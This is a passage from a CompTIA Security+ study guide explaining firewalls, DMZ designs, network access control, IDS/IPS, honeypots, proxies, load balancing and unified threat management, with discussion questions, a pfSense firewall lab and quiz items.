2. Why is the order for an ACL important for performance?
Every time the device examines traffic it goes through the ACL until it finds a rule that applies, then
stops. This takes processing time, so if the rules applying to the most common traffic are near the end of a
long list, performance will be lower than if they're near the beginning.
3. Your router's antispoofing ACL blocked a large volume of traffic from the internet. The packets were all
destined to different internal addresses, but all had a forged source address corresponding to the same
internal server. What might have been the goal of the attacker?
Most likely it was intended as a reflected DoS attack. If the destination computers had received the
packets, they would have all responded to that server.

About firewalls
Simply, any network element that uses pre-configured security rules to control network traffic is a firewall,
but that's a pretty broad category, and can be split up a number of ways. One of the most fundamental is in
what it protects.

Exam Objective: CompTIA SY0-501 2.1.1.2, 2.3.7.1, 2.4.4, 3.2.4.6

 A host-based firewall is software running on a single host, and protects just that host. In network terms
it's not usually separated from the host itself.
 A network-based firewall protects networks. Like a router (because usually it is a router), it might be a
specialized hardware device, or just a general purpose computer with multiple NICs and the right
software installed. Network-based firewalls are themselves divided into two categories depending on
their status in the logical network.

• A routed firewall is a logical node with an IP address, which segments the network like a normal
router. It can perform other routing functions, serve as a VPN endpoint, and so on. Traffic passing
through a routed firewall sees it as one routing hop.
• A virtual wire firewall is a physical node without an IP address, which can't perform any routing or
switching functions. It's also called a transparent firewall since allowed traffic passes through
without any routing hops or obvious changes. A transparent firewall doesn't segment the L2 network

218 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

or block multicast/broadcast traffic, which can be useful in some configurations. On the other hand,
since it's logically a L2 device it can't perform all the functions a routed firewall can.

Both kinds of firewalls function similarly in the software sense, which is to say they evaluate traffic according
to the same kinds of rules. In particular, they help to protect hosts on the network from worm infections,
attacks against vulnerable services, network probes, and other sorts of malicious traffic. Both types have their
individual benefits too.
 Host-based firewalls protect systems regardless of network conditions, and can also prevent unwanted
outbound traffic from Trojan horses or other unauthorized programs, even within the internal network.
 Network-based firewalls can be centrally configured, and can easily block access to certain services
from outside the network without disrupting their internal use.

Fortunately, you don't have to choose between the two: a network can have multiple firewalls, and in fact a
mixture of host-based and network-based firewalls has become the norm even in home and small office
environments. It's easy, since modern operating systems come with built-in firewall software, as do consumer
grade routers and access points. This is great, since firewalls are essential to network security: for instance,
before Service Pack 2 and its integrated firewall were released, vulnerabilities in Windows XP meant a system
could be infected by malware within moments just by connecting to the Internet. Larger and more secure
networks can use larger or more secure firewalls, such as third-party security software, servers configured as
firewalls, or high-performance enterprise-level hardware firewalls.

Filtering types
The first firewalls were just packet filters: routers with ACL-based filtering rules for what traffic they'd permit
through an interface. This kind of firewall makes its decisions based on the L3 header of each packet, and
maybe just a glimpse into the L4 header to see port numbers. It's called stateless filtering because every
packet is treated in isolation and put through the same filtering rules: the firewall doesn't know, or care,
whether a given packet is the start of a conversation, a reply, or the millionth in a lengthy session. Static
packet filtering is still used: it's easy to configure, quick to process, and works pretty well for a lot of traffic.
On the other hand, they can be confused by some kinds of conversations, and they're vulnerable to spoofing
attacks.

Exam Objective: CompTIA SY0-501 2.1.1.3


To solve these problems, the next generation of firewalls introduced stateful filtering, or stateful packet
inspection (SPI). A stateful firewall inspects source and destination headers, and possibly other TCP or UDP
data, in order to determine whether the current packet represents a new communication session, or a
continuation of an existing one. This also means a stateful firewall has to keep track of ongoing conversations
in a state table, terminate them when a host does, and time them out after they've been idle a while.
The SPI process takes more memory and more work than stateless filtering, but it adds a lot of flexibility. One
big benefit is that different rules can apply for continuing an existing session vs. starting a new one. It's
sometimes called dynamic packet filtering, since the firewall can modify rules based on what it knows about
the ongoing conversation. One of the most common uses is to block unsolicited inbound traffic, but let outside
hosts respond to connections initiated from the inside.
For a simple example, imagine that a firewall allows inside users to visit websites, so outbound connections to
TCP port 80 have to be allowed. For web servers to respond, the firewall has to allow inbound traffic from
port 80. A stateless firewall could be fooled by a packet using a spoofed source port: it claims to be a
responding website, but is actually something else entirely. A stateful firewall is smarter: it allows only
inbound traffic that's initiated from the inside.

CompTIA Security+ Exam SY0-501 219


Chapter 5: Securing networks / Module A: Network security components

1. The internal host A initiates a connection to web server B, starting a usual TCP handshake. It uses TCP
port 80 as its destination, and one of its own ephemeral ports (55555) as the source.
2. The firewall determines this is legitimate outbound traffic; it records the source and destination ports and
addresses, and records their combination.
3. Web server B sends its reply to the internal host: it's addressed to TCP port 55555, and from TCP port 80.
4. The firewall reads the remote address and port, and the local address and port. Seeing that they all match
the recorded session in its state table, it allows the traffic.
5. Once the handshake is complete, the conversation can continue: when either side closes the session, or
when enough time passes without traffic, the firewall removes the entry from its state table.
In contrast, imagine that attacker C sends a few spoofed packets: they say they're from port 80, but they're
actually a buffer overflow attack against a vulnerable port. A stateless firewall might be fooled and let it
through. Tricking the stateful firewall is much harder: C would have to guess, and spoof, internal and external
ports and addresses currently in the state table.
SPI doesn't solve every problem. There are still protocols that confuse it, and even if it tracks sessions it has
no way of knowing what type of traffic it's handling, just the ports it's using. The next step up is application
layer firewalls. While they can require a lot more processing power, application layer firewalls can use deep
packet inspection (DPI) to find irregularities SPI can miss or to enforce rules that would be difficult or
impossible to create on lower levels. In the previous example, DPI wouldn't just notice C's attack isn't part of
an existing session: it could also recognize the non-standard and harmful nature of the packets. DPI could also
be used to recognize services on non-standard ports: for example, if the network disallowed SSH traffic, DPI
could be used to prevent SSH connections over HTTP ports. These firewalls are often called context-aware or
application-aware, because they don't only monitor traffic and sessions, but the context information is
transmitted in and the applications being used.

DMZ topology
One way to look at a firewall is as a boundary between two different security zones of a network, regulating
what passes between them. If you're lucky, you'll get to administer a network where all of your hosts are in the
same "inside" intranet, the whole rest of the Internet is the "outside" zone, and you can just make sure as little
traffic as possible comes from the outside in. Not everyone's so lucky. It's especially difficult when the
network hosts services available to outside users, like web or email servers. Just opening those servers to
untrusted connections also opens them to attack; worse, even if outside traffic can be limited to those specific
servers, if they're compromised it can give an attacker inside access to the whole rest of the network.

Exam Objective: CompTIA SY0-501 3.2.1.1, 3.2.1.2, 3.2.1.3

220 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

A common way to solve the problem is to put any outside-facing services in a demilitarized zone (DMZ).
Don't take the terminology too literally, it's just a more colorful way of saying perimeter network. The DMZ
adds a third zone to network security: under the organization's direct control, but separate from, and less
trusted than, the internal network. That isn't to say the DMZ won't be protected too, just that traffic can't pass
freely from the DMZ to the internal network.

Note: Closely related to the DMZ is the extranet, a network zone that is designed for access by trusted
business partners or others who need access to hosted data or services, but who shouldn't get access to
the entire private network. An extranet serves a similar security role to a DMZ, it's just commonly
accessed through a VPN or other WAN connection rather than being quite so open to the internet.
There are a few topologies you can use for a DMZ. The easiest is to just place all the DMZ hosts outside the
firewall. This leaves them extremely vulnerable to attack, so in this configuration all DMZ hosts should be
configured as bastion hosts, hardened and secured as best as you possibly can against attackers, with all
unnecessary services disabled to minimize their attack surface. In this configuration, communication between
internal hosts and bastion hosts must be as tightly regulated as that between internal hosts and the internet.

Note: One of the simplest examples of a bastion host is a dual-homed server with two NICs, configured
as a firewall to bridge the inside and outside networks. Other outside-facing services can run on the
firewall, but you'll need to be very careful hardening it. Likewise, gateway routers and firewalls
themselves can often be considered bastion hosts.

A more secure alternative is a three-homed firewall (or multihomed firewall) connecting the three zones
(inside, outside, and DMZ.) Traffic passing between any two zones is protected by the firewall, so not only is
the inside protected from both the outside and DMZ, the DMZ is protected from outside. You can even apply
different rules to each particular route, so that ports open in the DMZ are closed on the inside network.

CompTIA Security+ Exam SY0-501 221


Chapter 5: Securing networks / Module A: Network security components

One of the most secure configurations is a dual firewall. Like the name suggests, it uses two firewalls: a
perimeter firewall that protects the DMZ from the outside, and an interior firewall that protects the inside
from the DMZ. This is an example of defense in depth: even if the perimeter firewall is compromised there's
still another layer of protection. This is more expensive and complicated, so isn't as common on small
networks.

CAUTION: SOHO routers with integrated firewalls often let you designate a specific IP address as a
"DMZ host." This option opens all ports to that host at once, which is useful for some purposes like
troubleshooting or connecting certain game consoles. Never confuse this with an actual DMZ, even a
bastion host. Unlike a member of a real DMZ, the DMZ host is still able to communicate directly with
the internal network, compromising overall security.

Network Access Control


It's easy to consider firewalls and DMZs as a separate security dimension from authentication systems, since
they do very different things. It's especially easy on a traditional wired network: internal systems can be
trusted because they're under the physical control of network administrators who can make sure they're not
easily compromised. Wireless or remote access networks throw a wrench in the idea: where exactly does a
newly connected client fit in the security zone structure? Even a trusted user might still log in with a
compromised system. For this reason, security zones sometimes have to be implemented even on
authenticated networks. This combination of AAA systems with network segmentation and host-level security
is sometimes called Network Access Control (NAC) or sometimes client control.

Exam Objective: CompTIA SYO-501 2.1.11, 3.2.1.5, 6.3.3.3

222 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

Many WAPs have a guest network feature. It creates a separate access point with its own SSID and login
credentials. Logging into it is similar to joining a DMZ: guest clients are on a separate network from internal
clients, and can't communicate to them directly. They can only use the WAP for Internet access. This is a
useful way to allow guests Internet access even if you don't trust that their devices, or even the users
themselves, would be safe on the private network. Especially in commercial environments the connection
might be to a captive portal webpage which asks for a username and password, email address, or even just
accepting an acceptable use policy. Until satisfying the portal requirements, users can't access any other
network resources at all.
For remote access via PPP or VPN this approach wouldn't work: the remote users probably have Internet
access already, so the whole point is for them to access internal network services they can't from outside the
firewall. Some authentication systems not only verify identity, but perform a posture assessment that makes
sure the client system meets certain security rules; for example, that it has appropriate antivirus software
installed, and that its operating system and relevant software is updated with the latest security updates. If the
client isn't up to date, it's instead connected to a quarantine network; it can't access sensitive network
resources, but instead is directed to download security updates and whatever else it needs.
Posture assessments can be used on any network requiring authentication, but since they can require a lot of
information about the client system they're more complicated than entering user credentials. For this reason
they often require clients to run an application, or agent, which performs the necessary checks locally.
 Permanent or persistent agents run automatically at operating system startup,
 Dissolvable agents run only during the login process.
 Agentless configurations might rely on less intrusive posture assessments, but some use Active
Directory features or integrate with other security software to perform the functions an agent normally
would.

Network management interfaces


Firewalls need to be configured and managed. So do routers and modern switches with advanced features. In
fact, almost any network appliance you can use today has a lot of settings and features you need to access. If
you're just configuring a computer to act as a firewall it might have a keyboard and monitor connected
already, but otherwise you have two main choices.
If a device is already connected to the network, you can access it through that same network. This is called in-
band management, and is convenient since you can check on the appliance from anywhere on the network.
Appliances marketed to the SOHO market, like home routers, tend to have simple web-based interfaces.
Enterprise devices might also support SSH terminal access, or network management protocols like SNMP so
that you can centrally manage all your network devices.
Some devices let you access them through a separate interface not connected to the network, in what is called
out of band management (OOB). Depending on the device this could be a serial interface for a management
terminal, or it could be a separate network interface to a management network that doesn't interact with the
main business network. If you're using an old computer as a firewall, its out of band interface is that keyboard
and monitor still attached to it. OOB interfaces have the benefit that they can be accessed even if the network
is down or congested, and might even be usable to cycle power to an otherwise unresponsive device.
A network device might have either or both interface types, but you need to secure them. In-band interfaces
should use secure protocols such as HTTPS, SSH, or SNMPv3, and be protected by strong passwords or other
credentials. Out-of-band interfaces are safe from attacks through the regular network, but they still must be
physically secured against intrusion, especially if part of a separate management network.

CompTIA Security+ Exam SY0-501 223


Chapter 5: Securing networks / Module A: Network security components

Discussion: Firewalls
1. Why would you still want a firewall at the edge of your subnet, when every PC on it has a firewall
application already?
Apart from the added security benefits of an extra layer of defense, you might want to open ports for
applications you use within the network, while blocking those services from outside traffic.
2. What types of traffic can still fool stateful firewalls?
Examples include packets with hazardous contents, or normal protocols running on non-standard ports.
3. Why shouldn't you use a home router's DMZ setting to set up an actual DMZ?
It's really not the same thing at all. The home router version just removes firewall protection from one
host, rather than creating an actual perimeter network.
4. What is the firewall configuration on your home or office network?
Answers may vary.

Exercise: Configuring a firewall


In this exercise, you'll configure the network firewall built into the pfSense VM. pfSense serves as a router
between your two Windows VMs and the internet.
Do This How & Why

1. Log into the pfSense router from the You could configure the router from its text interface, but it's
Windows 7 VM. easier to use its remote web interface.

a) In Firefox, browse to You're asked for a username and password


10.10.10.1.

b) Log in with username admin and


password pfsense.

2. View firewall settings.

a) From the top menu, click Firewall


> Rules.

The Firewall: Rules page opens. By default, the rules for the
WAN interface are selected.

b) Examine the WAN rules. The firewall is configured to block (silently drop) all bogon
traffic from illegitimate IP addresses not assigned by the
IANA, which is normal for firewalls. It's also configured to
reject all unsolicited inbound traffic, meaning that it's blocked
but sends an ICMP reject message.

c) Next to the Block All In rule, click The Edit page opens for the rule.
.

224 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

Do This How & Why

d) In the Action section, choose Since Block doesn't send any error messages to an attacker, it's
Block. generally more secure than Reject.

e) Scroll to the bottom of the page and You return to the Rules page. You need to apply your changes
click Save. for them to take effect, but you have other rules to set first.

3. Edit LAN rules. The router has three interfaces. The WAN port points toward
the internet, the LAN port toward the 10.10.10.0 subnet with
the Windows machines, and the LAN2 port toward the
currently unused 10.10.20.0 subnet.

a) Click LAN.
The LAN currently allows all outbound traffic going to other networks. This isn't unusual either.

b) Modify the last rule. Click the Edit button. The Edit page opens for the rule.

c) From the Protocol list, choose TCP. You'll make this a rule to specifically allow outbound HTTP
traffic, which is TCP.

d) In the first list in the Destination port range section, choose HTTP (80).

e) Click Save. To return to the LAN rules.

4. Create a new LAN rule. You'll create a matching rule to allow HTTPS traffic.

a) Below the existing rules, click . Firewalls process rules in order, and you want to put this one
after the existing ones. The Edit page opens again.

b) In the Source section, choose LAN


net from the Type list.

CompTIA Security+ Exam SY0-501 225


Chapter 5: Securing networks / Module A: Network security components

Do This How & Why

c) In the Destination section, choose It's a rule for outbound traffic.


WAN net from the Type list.

d) In the Destination port range


section, choose HTTPS (443) from
the first list.

e) Scroll down and click Save.

5. At the top of the Firewall: Rules page, To commit to the changes and configure the firewall.
click Apply Changes.

6. Close Firefox.

226 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

Intrusion detection and prevention


Closely related to firewalls, but not entirely synonymous, are intrusion detection systems and intrusion
prevention systems (IDS and IPS). The two are closely related: both are designed to monitor network traffic
and other events, and look for anything suspicious that might be indicative of an attack. When suspicious
behavior is spotted, the system takes some kind of action, even if it's just recording the incident for later
review. There are a lot of ways to recognize attacks, but they fall into three general categories. Any given
system might use one or more of them.

Exam Objective: CompTIA SY0-501 2.1.3.1, 2.1.3.2, 2.1.3.3, 2.1.3.6, 2.1.3.7

Signature-based Methods that look for behavior characteristic of known attacks. For example, the particular
malformed packet used by a known worm might be on the list of suspicious signatures, as
might a telnet attempt into the root account. Signature-based methods are great at stopping
many known attacks, but they'll miss anything that's not on the list.
Stateful protocol Methods that use SPI or DPI to analyze traffic by examining the protocol it uses, and
analysis comparing to a profile of how that protocol is supposed to work. A single SYN packet isn't
suspicious, but a sudden rush of them suggests a flood attack. Incoming packets that look
like HTTP sessions at the network layer but are an entirely different protocol at the
application layer would also be suspicious. Stateful protocol analysis can detect many
attacks signature-based methods won't, but it's still only as good as the profiles. This is
especially difficult with proprietary protocols that don't have full documentation available
to the public.
Anomaly-based Methods that look for behavior that looks unusual, at least relative to a normal baseline of
(or heuristic) past or expected behavior. Even if it doesn't directly match any signatures or misuse
protocols, a traffic spike from a DDoS attack is an anomaly. So is a new kind of traffic not
usually seen on the network, or a local user logging in from a foreign IP address. Heuristic
detection is very difficult to design, and takes a lot of data gathering to be accurate, but of
the three it's the most able to catch dangerous zero-day attacks against vulnerabilities no
one even knew existed.

Regardless of the method, whether any given type of traffic is classified as benign, suspicious, or unknown is
subject to change. Signatures and profiles can be updated, baselines are adjusted as the system gets more data,
and so on. Some elements of the process require administrator intervention or approval, while others might
happen automatically as the system learns more about its network.
Whenever the IDS (or IPS) evaluates a potential intrusion and makes a decision, there are four possible
results.

True positive An attack occurred, and the IDS recognized it. This is a good result: even if the attack itself
is bad, it was recognized and can be addressed.
True negative The event was benign, and triggered no alerts. This is a good result, since everything is
quietly working properly.
False positive The event was benign, but the IDS mistook it for an attack. This is bad: frequent false
alarms can disrupt network function, cost administrators time, or just make people less alert
when a real attack happens.
False negative An attack occurred, and the IDS mistook it for benign behavior. This is potentially
disastrous, since the network could be compromised without anyone knowing.

CompTIA Security+ Exam SY0-501 227


Chapter 5: Securing networks / Module A: Network security components

As you can tell, the positive/negative side is all the IDS sees: the true/false element is reliant on human
oversight and sometimes perfect hindsight. The goal of managing any sort of IDS, IPS, or firewall is to
choose a set of rules that minimize both false positives and false negatives, with the understanding that it's
always better to have a false positive than a false negative.

IDS vs IPS
It can be difficult to distinguish between intrusion detection and prevention, and for that matter how each
differs from firewalls. To some extent, products often do both and the difference is marketing, but not entirely.

Exam Objective: CompTIA SY0-501 2.1.3.4, 2.1.3.5, 2.4.1

 Intrusion detection systems are fundamentally passive monitoring systems designed to keep
administrators aware of malicious activity: they can record detected intrusions in a database, and send
alert notifications, but they rely on humans to actually take action. This has some advantages: false
positives won't automatically interrupt benign activities without human oversight, and the evaluation
process never has to delay traffic on a busy network or system.
 Intrusion protection systems are active protection systems, and are also known as intrusion prevention
systems or active IDS. While they still might keep logs and trigger alerts, they're defined by how they
can actively block traffic, disconnect users, lock accounts, or whatever else they're given permission to
do when an attack is detected. An IPS can protect damage from being done before a human can
respond, but it can also harm network or system functions by acting on false positives. Since an IPS has
to be able to intervene, it must be placed where it can block traffic or control system activities itself. An
IPS can also have IDS capabilities: in that case it's called an IDPS.

Like firewalls, both can be located either on the network, or on a host. The two have some overlap, but focus
on different elements of security and can easily be used in tandem.
 Network-based systems (NIDS or NIPS) are placed on routers or other network choke points, and focus
primarily on detecting network attacks, probes, or other suspicious traffic on the network level. They
can protect entire subnets, and give the big picture of network activity. Like managed switches or other
network appliances, they can use in-band or out-of-band interfaces for management and logging. They
can also be divided depending on how they handle incoming traffic.

• Inline sensors traffic as it passes through and take action based on their findings, much like a
firewall. Inline sensors can become a performance bottleneck, but only an inline IPS can prevent a
harmful packet from reaching its destination.
• Passive sensors route a copy of incoming traffic to a monitoring port without interfering with its
passage. This allows higher network performance and lower latency, but a passive sensor can't block an
attack entirely. This doesn't impair the functions of a NIDS, but a passive NIPS is restricted to actions like
resetting TCP connections and other methods that don't require directly blocking traffic.

 Host-based systems (HIDS or HIPS) are placed on individual hosts and devices to protect them. They
can monitor network traffic to and from their installed hosts, even data sent by encrypted protocols.
They can also watch for suspicious user activities, changes to system files, or other signs of host-based
attacks. Antivirus and antimalware programs with real-time monitoring are one example of HIPS.

It wouldn't be hard to look at all of this and say that a firewall is just an IPS focused on network traffic, and
you wouldn't be entirely wrong. The distinction gets even tougher when you consider higher level firewalls
with SPI or DPI rules meant to scout out suspicious traffic. Still, there are important distinctions. One is the
way rules are designed for each. A firewall is based on implicit deny, and has rules designed to specify the
kinds of traffic that should be allowed through. An IPS is based on implicit allow: its rules are designed to
specify types of traffic that should be blocked.

228 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

Honeypots and honeynets


Sometimes security isn't exactly intuitive. One example is a honeypot, a system designed to be attractive and
accessible to attackers. It might be completely open, or it might have an outwardly reasonable but flawed or
inadequate level of security. In actuality it's a decoy: the honeypot has no useful resources, and it's isolated
from the rest of the network (in a DMZ for example) so that compromising it won't even be useful for
mounting an inside attack. Instead, it's monitored to gather information on attackers without actually risking
the consequences of an attack on real systems. You can even deploy a whole network of honeypots, called a
honeynet.

Exam Objective: CompTIA SY0-501 2.2.10, 3.2.1.6


Honeypots and honeynets can be used for a variety of purposes. Security researchers use them to study the
methods and motives of attackers and develop countermeasures. Law enforcement agencies use them for sting
operations to catch hackers. Private organizations might use them to test security measures "in the wild" or to
provide tempting targets in hopes that attackers will go after the honeypot first and give advance notice of
plans against production systems. Likewise, a honeypot can be seen as either intrusion detection or intrusion
prevention: it's the former when you use it to detect the presence of active attackers before they reach the real
network, and it's the latter if it draws attackers to the useless honeypot instead of systems with resources of
actual value.
Honeypots can enhance network security by detecting threats and vulnerabilities, but they're not suited to
every network. Additionally, they pose ethical and legal concerns: before configuring systems to serve as bait
for hackers, make sure you're not violating any laws or policies by doing so.

Discussion: Threat detection methods


1. What IDS or IPS systems are in use on your network?
Answers may vary.
2. Why is heuristic analysis useful no matter how good your signature database is?
Good heuristic algorithms have a chance of noticing zero-day attacks that no signature system will.
3. How can a honeypot increase the security of your network?
Apart from the fact that an attacker might go after the honeypot first to give you advance warning, you
can examine how the attack worked to find potential vulnerabilities in your own network.
4. On an IDS or IPS system, what are the benefits of inline vs. passive placement?
Inline monitoring can hurt performance but allows harmful traffic to be blocked. Passive monitoring
allows higher performance and lower latency, but it can't block traffic directly.

CompTIA Security+ Exam SY0-501 229


Chapter 5: Securing networks / Module A: Network security components

Application layer and combined security


As security needs become more sophisticated, it's common for security devices or software to combine
multiple functions, and to scan traffic using more sophisticated, and thus usually higher level, methods.
Application layer firewalls and IDS/IPS are two examples of this, but there are a number of others in common
use today.

Exam Objective: CompTIA SY0-501, 2.4.12


Application layer firewalls can also be more specialized, focusing on protecting particular applications and
services on the network. One example is the web application firewall, which sits between the network and a
web server running web applications. Like an ordinary firewall, a web application firewall can be host-based
software or a standalone hardware appliance. Unlike an ordinary firewall, it's specialized to protect against
attacks targeting web servers and applications, such as forged HTTP requests, buffer overflows, SQL
injection, and cross-site scripting.
Often, security can be enhanced by using devices and technologies originally designed to aid in other network
functions. Segmentation technologies like VLANs are one, NAT devices are another. Network optimization
devices like load balancers and proxy servers also are natural places to add security features.
Finally, security follows the same tendency of many other computers and network devices: over time, more
features and functions are combined in a single product. Increasingly, it's possible to meet most or all of your
network's security needs in a single, centrally-managed solution.

Content filtering
Content filters are software applications designed to restrict what information can reach the network, but
instead of protecting against attacks, it's meant to control types of content. For example, web content filters
might be intended to keep users from accessing pornographic content or other objectionable materials, while
spam filters are used to block spam email messages before they arrive in user inboxes. They're not exactly the
same as firewalls, but they're conceptually related, and often the same device will perform both tasks.

Exam Objective: CompTIA SY0-501 2.2.12, 2.3.7.2, 3.2.4.4


Like firewalls, content filters monitor traffic based on pre-configured rules which can allow or deny specific
content. Simpler filters are address-based; more sophisticated ones can examine the content itself to look for
keywords or patterns that seem suspicious. Web and email filters alike can also be useful in more
conventional security roles, by blocking suspected sources of malware. Mail gateways are also often used for
encryption or as part of DLP solutions.
Content filters are sometimes part of network firewalls, but they're frequently combined with proxy servers or
web application firewalls that are already specialized to handle web traffic. Combination devices of this type
are commonly called web security gateways, and can be used to protect web users on your network from
malicious internet sites.

Load balancing
It's not always easy increasing network capacity to overcome a bottleneck, especially on larger, busier
networks. Eventually upgrading to something faster just isn't a convenient or affordable option, no matter how
important the service is. At that point, you need to share the workload between multiple slower components.
If you do it right, this sort of load balancing has the added benefit of increased reliability, ensuring that failure
of one redundant component will only hurt performance rather than cause network failures.

Exam Objective: CompTIA SY0-501 3.2.4.9


One way to do this is by distributing heavily used services over multiple devices: not only can you host
different services on different servers, sometimes even different components of one service (like an

230 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

authentication server) are designed to be distributed between different hardware devices. You can even
segment networks and split services up by department if you need to.
When those aren't ideal, another option is to use load balancing appliances, hardware or software devices
designed to transparently combine distributed services into a single virtual whole. Channel bonding is one
example: if upgrading that overloaded trunk line to a faster Ethernet standard isn't feasible, you can combine
multiple physical interfaces into one virtual line. Load balancing routers can be used to split traffic over
multiple routes depending on congestion conditions. Load balancing is even possible for servers by means of
a content switch, a higher layer router that uses NAT to split server requests between multiple identical servers
that share a single virtual IP address. For example, if you need three physical web servers to handle your
traffic load, you could use a content switch to make them look like a single server to the outside network.

Load balancing devices can perform a variety of functions, all designed to distribute elements of one logical
service out among multiple physical devices, or to increase redundancy and availability.
 SSL acceleration moves the processing overhead associated with SSL or TLS encryption to another
server, or to a hardware appliance with accelerated encryption features.
 Data compression uses standard compression methods to reduce the bandwidth required by some kinds
of data traffic.
 Health checking tracks the functionality of each server in the load balancing pool, removing it in case
of failure.
 TCP offloading and TCP buffering move resource-intensive TCP services to different servers than those
performing server application functions.
 Priority queuing, much like QoS, allows some traffic to be given priority over others.
 Content caching allows the balancer itself to store the most frequently accessed content without
contacting the servers behind it.

As you might be able to guess, the functions a load balancer has to perform already makes it a natural place to
add additional security features, such as web application firewalls, IDS/IPS, and other protections.

Load balancer configurations


Load balancing is a great way to achieve high performance and high availability, but it adds a lot of
complexities to what might otherwise be a straightforward network service. Exactly what they are depend on
exactly what you're load balancing, but for an example imagine that you're load-balancing a high-volume web
application across multiple redundant servers.

Exam Objective: CompTIA SY0-501 2.1.7


The first question is that of scheduling. You want to make sure that incoming connections are spread evenly
throughout servers without overloading any one of them. While it's technically possible to query the servers to

CompTIA Security+ Exam SY0-501 231


Chapter 5: Securing networks / Module A: Network security components

see which has the least load, that's complicated and generates traffic, so it's generally easiest to choose some
automated method. When you receive a connection you could randomly choose a server, or assign them in
round robin order. If your servers have different capacity, you can weight the algorithm to make sure more
powerful servers receive a larger workload.

Note: Round robin scheduling in particular is often implemented at the DNS level, with multiple server
IP addresses associated with the same server name. Whenever someone requests the load-balanced
server's name from the round robin DNS, it responds with the next IP address in the list.
Once you have scheduling set up for new connections there's another problem. Most web applications are
session-oriented, but HTTP is not a connection-oriented protocol. Every time the same user sends another
request to the server, the server sees it as a whole new communication. On a single server this is solved by
tools like session cookies, but those don't work very well if the load balancer sends the next request to a
different server that's genuinely never heard from that user before. The load balancer needs a method to allow
"sticky" sessions that always go to the same server, regardless of whether it's next in line or not.

IP affinity The load balancer tracks ongoing sessions based on the source IP address, and always routes
their requests to the same server. It's easy to track, but has some limitations such as mobile
clients that change IP addresses as they switch network connections.
Persistence The load balancer uses session cookies to track ongoing sessions regardless of IP address. It
might use the session cookie from the web server, or might issue one of its own.

Finally, one of the main benefits of using load balancing is to achieve higher availability than a single server
can provide. If one fails, the others are available. There are two main ways to achieve this.

Active-active All redundant servers (or other resources) are constantly available and sharing the load. If
one fails, its workload is distributed to remaining nodes. This is the usual load-balancing
approach, but it only works if there is enough excess capacity to compensate for failed
nodes. If a critical server crash overloads other servers, it might cause a cascading failure.
Active-passive In addition to any active nodes, there are one or more failover nodes that are left on standby
until an active node fails, then immediately are activated. Active-passive configurations
enforce excess capacity by leaving passive nodes deliberately idle until needed, and they can
also escape some network attacks that might compromise multiple active nodes at once, but
they require more additional hardware expense.

Proxy servers
Related to load balancers are proxy servers. A proxy server is an intermediary between a client and a server:
instead of the client contacting the server directly, it contacts the proxy server, which in turn contacts the
remote server. In return, the remote server communicates with the client through the proxy server. Often you
might see a proxy server on the perimeter network, mediating connections between the LAN and the Internet.

Exam Objective: CompTIA SY0-501 2.1.6, 3.2.4.5

 Forward proxies mediate communications between LAN clients and Internet servers, but require client-
side configuration. They're often used on small, but heavily secured, networks.
 Transparent proxies operate like forward proxies, but don't require any special client configuration.
They're more commonly used on large enterprise networks. They're sometimes called forced proxies,
because the client doesn't choose whether to use them.
 Reverse proxies mediate communications between Internet clients and LAN servers.
 Anonymous proxies are usually hosted on the Internet, and mask the client's original IP address from
the server.

232 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

It might seem like adding a middle man would hurt performance rather than help it. It's true that a proxy
server can be a potential bottleneck, but it can also serve many positive functions, among them performance
enhancement. Reverse proxies in particular are often part of load balancing solutions.
 Content caching of frequently accessed data
 Load balancing for internal servers
 Increased security or anonymity
 NAT functions
 Content filtering
 SSL offloading and decryption

Much like a load balancer, a proxy server is a natural place for combining security features in addition to
those they provide already. Reverse proxies have a lot of overlap with load balancers so the same options are
available. Forward proxies meanwhile can be enhanced with content filters and IDS/IPS designed to protect
local users from malicious internet content.

Unified threat management


Security is no exception to the trend of combining multiple related device functions into a single product,
whether to save equipment costs or reduce administrative overhead. New all-in one solutions are often called
next-gen firewalls, or for a less self-dating term unified threat management (UTM) firewalls. UTM isn't a
concrete standard, but rather the concept of putting a complete network security solution into a single
centrally controlled system.

CompTIA Security+ Exam SY0-501 233


Chapter 5: Securing networks / Module A: Network security components

This means that a UTM appliance might have any combination of security features, or be customizable for
individual organizations.

Exam Objective: CompTIA SY0-501 2.4.9

 Firewall
 IDS
 IPS
 Content filtering
 Network-based antimalware
 DMZ interface
 NAT or proxy server
 VPN endpoint
 Network access control
 Posture assessment
 Industry-based regulatory compliance checking

Discussion: Application layer security


1. How do web application firewalls differ from ordinary firewalls?
Unlike an ordinary firewall, it's specialized to protect against attacks targeting web servers and
applications, such as forged HTTP requests, buffer overflows, SQL injection, and cross-site scripting.
2. Does your organization use any proxy servers?
Answers may vary.
3. What might content filters be used for?
Web content filters might be intended to keep users from accessing pornographic content or other
objectionable materials, while spam filters are used to block spam email messages before they arrive in
user inboxes.
4. What is the biggest difference between active-active and active-passive load balancing?
5. If time allows, do a web search for UTM solutions.
Results may vary.

Assessment: Network security components


1. ACLs are based on which assumption? Choose the best response.
 Explicit Allow
 Explicit Deny
 Implicit Allow
 Implicit Deny

2. When configuring an IDS you might want to allow a few false positives to make sure you never get any
false negatives, but not the opposite. True or false?
 True
 False

234 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

3. You're configuring a router, and want it to check the properties of incoming traffic before passing it on.
What will this require? Choose the best response.
 Configuring ACLs
 Configuring routing tables
 Either would have the same effect
 Only a fully featured firewall can do this.

4. What kind of proxy would you use to mediate communications between Internet-based clients and LAN-
based servers?
 Anonymous
 Forward
 Reverse
 Transparent

5. What DMZ topology is displayed? Choose the best response.

 Bastion Host
 Dual firewall
 Three-homed firewall
 UTM firewall

6. NIST defines the standards for UTM devices. True or false?


 True
 False

7. Which of the following is an example of a load balancer scheduling method? Choose the best response.
 Active-active
 Active-passive
 Round robin
 Virtual IP

CompTIA Security+ Exam SY0-501 235


Chapter 5: Securing networks / Module B: Transport encryption

Module B: Transport encryption


Older network protocols, and even some newer ones, can be very insecure. They might use weak encryption
or none at all, and authentication information like passwords, if included at all, might be poorly protected or
